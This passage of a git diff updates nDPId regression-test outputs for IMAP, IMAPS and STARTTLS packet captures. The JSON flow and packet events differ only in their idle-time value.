+00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"imap-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1437584567812,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1437584567812,"pkt":"kFmvW2bUaKhtGGkOCABFAABAc8pAAEAGDnPAqBE11OMRusHoAI+CJObQAAAAALAC\/\/\/XTwAAAgQFtAEDAwQBAQgKKoxROgAAAAAEAgAA"} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"imap-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1437584568002,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437584568002,"pkt":"aKhtGGkOkFmvW2bUCABFIAA0AABAADAGkinU4xG6wKgRNQCPwehPqEW7giTm0YASPryvAAAAAgQFtAQCAwMKAAAA"} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"imap-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1437584568002,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437584568002,"pkt":"kFmvW2bUaKhtGGkOCABFAAAohpRAAEAG+8DAqBE11OMRusHoAI+CJObRT6hFvFAQQAD2hgAA"} +00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"imap-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1437584567812,"flow_last_seen":1437584568383,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":271,"flow_tot_l4_payload_len":524,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1437584568383,"l3_proto":"ip4","src_ip":"192.168.17.53","dst_ip":"212.227.17.186","src_port":49640,"dst_port":143,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"IMAPS","breed":"Safe","category":"Email"}} +00823{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":32,"source":"imap-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1437584567812,"flow_last_seen":1437584570828,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6193,"flow_avg_l4_payload_len":193,"midstream":0,"thread_ts_msec":1437584570828,"l3_proto":"ip4","src_ip":"192.168.17.53","dst_ip":"212.227.17.186","src_port":49640,"dst_port":143,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"IMAPS","breed":"Safe","category":"Email"}} 00558{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":32,"source":"imap-starttls.pcap","alias":"nDPId-test","packets-captured":32,"packets-processed":32,"total-skipped-flows":0,"total-l4-data-len":6193,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1437584570828} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 32/32 diff --git a/test/results/imap.pcap.out b/test/results/imap.pcap.out index f266171bd..86b8dbb9b 100644 --- a/test/results/imap.pcap.out +++ b/test/results/imap.pcap.out @@ -1,11 +1,11 @@ 00455{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"imap.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00541{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"imap.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1213095262213} -00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"imap.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1213095262213,"flow_last_seen":1213095262213,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1213095262213,"l3_proto":"ip4","src_ip":"10.40.4.2","dst_ip":"10.40.3.2","src_port":46045,"dst_port":143,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"imap.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1213095262213,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1213095262213,"pkt":"AASWJ8g6ABUXJM1lCABFAAA8nkhAAEAGgSAKKAQCCigDArPdAI+IaqplAAAAAKACFtDwZgAAAgQFtAQCCAoKDDQtAAAAAAEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"imap.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1213095262213,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1213095262213,"pkt":"ABUXJM1lAASWJ8g6CABFAAA8VURAAH8GiyQKKAMCCigEAgCPs903+0YNiGqqZqASIAAxdQAAAgQFtAEDAwgEAggKAoc1IAoMNC0="} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"imap.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1213095262213,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1213095262213,"pkt":"AASWJ8g6ABUXJM1lCABFAAA0nklAAEAGgScKKAQCCigDArPdAI+IaqpmN\/tGDoAQAC6AFAAAAQEICgoMNC0ChzUg"} -00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"imap.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1213095262213,"flow_last_seen":1213095266594,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1213095266594,"l3_proto":"ip4","src_ip":"10.40.4.2","dst_ip":"10.40.3.2","src_port":46045,"dst_port":143,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"IMAP","breed":"Unsafe","category":"Email"},"imap": {"user":"samir","password":"pfres"}} -00784{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":33,"source":"imap.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1213095262213,"flow_last_seen":1213095266780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":696,"flow_tot_l4_payload_len":1580,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1213095266780,"l3_proto":"ip4","src_ip":"10.40.4.2","dst_ip":"10.40.3.2","src_port":46045,"dst_port":143,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"IMAP","breed":"Unsafe","category":"Email"}} +00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"imap.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1213095262213,"flow_last_seen":1213095262213,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1213095262213,"l3_proto":"ip4","src_ip":"10.40.4.2","dst_ip":"10.40.3.2","src_port":46045,"dst_port":143,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"imap.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1213095262213,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1213095262213,"pkt":"AASWJ8g6ABUXJM1lCABFAAA8nkhAAEAGgSAKKAQCCigDArPdAI+IaqplAAAAAKACFtDwZgAAAgQFtAQCCAoKDDQtAAAAAAEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"imap.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1213095262213,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1213095262213,"pkt":"ABUXJM1lAASWJ8g6CABFAAA8VURAAH8GiyQKKAMCCigEAgCPs903+0YNiGqqZqASIAAxdQAAAgQFtAEDAwgEAggKAoc1IAoMNC0="} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"imap.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1213095262213,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1213095262213,"pkt":"AASWJ8g6ABUXJM1lCABFAAA0nklAAEAGgScKKAQCCigDArPdAI+IaqpmN\/tGDoAQAC6AFAAAAQEICgoMNC0ChzUg"} +00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"imap.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1213095262213,"flow_last_seen":1213095266594,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1213095266594,"l3_proto":"ip4","src_ip":"10.40.4.2","dst_ip":"10.40.3.2","src_port":46045,"dst_port":143,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"IMAP","breed":"Unsafe","category":"Email"},"imap": {"user":"samir","password":"pfres"}} +00784{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":33,"source":"imap.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1213095262213,"flow_last_seen":1213095266780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":696,"flow_tot_l4_payload_len":1580,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1213095266780,"l3_proto":"ip4","src_ip":"10.40.4.2","dst_ip":"10.40.3.2","src_port":46045,"dst_port":143,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"IMAP","breed":"Unsafe","category":"Email"}} 00549{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":33,"source":"imap.pcap","alias":"nDPId-test","packets-captured":33,"packets-processed":33,"total-skipped-flows":0,"total-l4-data-len":1580,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1213095266780} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 33/33 diff --git a/test/results/imaps.pcap.out b/test/results/imaps.pcap.out index 8e09d13ba..f46019265 100644 --- a/test/results/imaps.pcap.out +++ b/test/results/imaps.pcap.out @@ -1,13 +1,13 @@ 00456{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"imaps.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00542{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"imaps.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1590857744659} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590857744659,"flow_last_seen":1590857744659,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1590857744659,"l3_proto":"ip4","src_ip":"192.168.1.8","dst_ip":"167.99.215.164","src_port":50506,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1590857744659,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1590857744659,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+f\/AqAEIp2PXpMVKA+HRNM\/NAAAAALAC\/\/\/ajwAAAgQFtAEDAwUBAQgKFE2dOQAAAAAEAgAA"} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1590857744706,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1590857744706,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGBgSnY9ekwKgBCAPhxUrMi6La0TTPzqAS\/ojr6QAAAgQFrAQCCAqpw+fsFE2dOQEDAwc="} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1590857744706,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1590857744706,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+gvAqAEIp2PXpMVKA+HRNM\/OzIui24AQECwI4wAAAQEIChRNnWGpw+fs"} -00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1590857744659,"flow_last_seen":1590857744710,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1590857744710,"l3_proto":"ip4","src_ip":"192.168.1.8","dst_ip":"167.99.215.164","src_port":50506,"dst_port":993,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mail.ntop.org","ja3":"4923a265be4d81c68ecda45bb89cdf6a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01008{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1590857744659,"flow_last_seen":1590857744765,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1667,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1590857744765,"l3_proto":"ip4","src_ip":"192.168.1.8","dst_ip":"167.99.215.164","src_port":50506,"dst_port":993,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mail.ntop.org","ja3":"4923a265be4d81c68ecda45bb89cdf6a","ja3s":"b653c251b0ee54c3088fe7bb997cf59d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} -01212{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1590857744659,"flow_last_seen":1590857744765,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3107,"flow_avg_l4_payload_len":443,"midstream":0,"thread_ts_msec":1590857744765,"l3_proto":"ip4","src_ip":"192.168.1.8","dst_ip":"167.99.215.164","src_port":50506,"dst_port":993,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mail.ntop.org","server_names":"mail.ntop.org","ja3":"4923a265be4d81c68ecda45bb89cdf6a","ja3s":"b653c251b0ee54c3088fe7bb997cf59d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=mail.ntop.org","fingerprint":"F1:9A:35:30:96:57:5E:56:81:28:2C:D9:45:A5:83:21:9E:E8:C5:DF"}} -00815{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1590857744659,"flow_last_seen":1590857744987,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3856,"flow_avg_l4_payload_len":192,"midstream":0,"thread_ts_msec":1590857744987,"l3_proto":"ip4","src_ip":"192.168.1.8","dst_ip":"167.99.215.164","src_port":50506,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590857744659,"flow_last_seen":1590857744659,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1590857744659,"l3_proto":"ip4","src_ip":"192.168.1.8","dst_ip":"167.99.215.164","src_port":50506,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1590857744659,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1590857744659,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+f\/AqAEIp2PXpMVKA+HRNM\/NAAAAALAC\/\/\/ajwAAAgQFtAEDAwUBAQgKFE2dOQAAAAAEAgAA"} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1590857744706,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1590857744706,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGBgSnY9ekwKgBCAPhxUrMi6La0TTPzqAS\/ojr6QAAAgQFrAQCCAqpw+fsFE2dOQEDAwc="} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1590857744706,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1590857744706,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+gvAqAEIp2PXpMVKA+HRNM\/OzIui24AQECwI4wAAAQEIChRNnWGpw+fs"} +00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1590857744659,"flow_last_seen":1590857744710,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1590857744710,"l3_proto":"ip4","src_ip":"192.168.1.8","dst_ip":"167.99.215.164","src_port":50506,"dst_port":993,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mail.ntop.org","ja3":"4923a265be4d81c68ecda45bb89cdf6a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01008{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1590857744659,"flow_last_seen":1590857744765,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1667,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1590857744765,"l3_proto":"ip4","src_ip":"192.168.1.8","dst_ip":"167.99.215.164","src_port":50506,"dst_port":993,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mail.ntop.org","ja3":"4923a265be4d81c68ecda45bb89cdf6a","ja3s":"b653c251b0ee54c3088fe7bb997cf59d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} +01212{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1590857744659,"flow_last_seen":1590857744765,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3107,"flow_avg_l4_payload_len":443,"midstream":0,"thread_ts_msec":1590857744765,"l3_proto":"ip4","src_ip":"192.168.1.8","dst_ip":"167.99.215.164","src_port":50506,"dst_port":993,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mail.ntop.org","server_names":"mail.ntop.org","ja3":"4923a265be4d81c68ecda45bb89cdf6a","ja3s":"b653c251b0ee54c3088fe7bb997cf59d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=mail.ntop.org","fingerprint":"F1:9A:35:30:96:57:5E:56:81:28:2C:D9:45:A5:83:21:9E:E8:C5:DF"}} +00815{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1590857744659,"flow_last_seen":1590857744987,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3856,"flow_avg_l4_payload_len":192,"midstream":0,"thread_ts_msec":1590857744987,"l3_proto":"ip4","src_ip":"192.168.1.8","dst_ip":"167.99.215.164","src_port":50506,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} 00551{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":20,"source":"imaps.pcap","alias":"nDPId-test","packets-captured":20,"packets-processed":20,"total-skipped-flows":0,"total-l4-data-len":3856,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1590857744987} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 20/20 diff --git a/test/results/instagram.pcap.out b/test/results/instagram.pcap.out index 8b0443646..75486aa4d 100644 --- a/test/results/instagram.pcap.out +++ b/test/results/instagram.pcap.out @@ -1,47 +1,47 @@ 